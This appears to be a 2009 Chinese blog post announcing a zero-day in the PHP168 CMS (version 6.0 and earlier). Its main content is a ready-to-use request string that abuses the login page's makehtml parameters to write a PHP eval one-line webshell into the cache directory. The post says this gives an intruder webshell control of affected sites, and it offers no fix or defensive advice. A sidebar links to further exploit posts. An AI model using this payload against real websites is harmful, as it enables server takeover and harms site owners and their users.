PHP168 6.0及以下版本0day | Chinadu's Blog

首页 > 技术文章 > PHP168 6.0及以下版本0day

PHP168 6.0及以下版本0day

2009年9月9日 Chinadu 发表评论 154 views 阅读评论

影响版本：PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句，将PHP一句话写入cache目录，从而获得使用PHP168整站程序网站的WEBSHELL权限。

测试语句：

?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?

相关文章

2010年06月10日 -- 你还敢执行txt文件吗？Windows 0day
2010年05月21日 -- 橙色预警：PHP PATH_INFO 存在漏洞
2010年04月23日 -- Shopex V4.8.4 V4.8.5 0Day 通杀
2010年04月1日 -- PDF最新0day
2010年03月24日 -- Firefox 3.6 0day被补了
2010年03月10日 -- DedeCms v5.5 0day
2010年01月31日 -- 瑞星本地提权通杀利用代码
2010年01月20日 -- IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告
2009年09月22日 -- Gnuboard 0day&Exp
2009年09月22日 -- 新云4.0最新0day

分类: 技术文章标签: 0day, PHP168

评论 (0) Trackbacks (0) 发表评论 Trackback

本文目前尚无任何评论.

本文目前尚无任何 trackbacks 和 pingbacks.

爆笑视频：这哥们一看从小就没爬过树内存扫描及编辑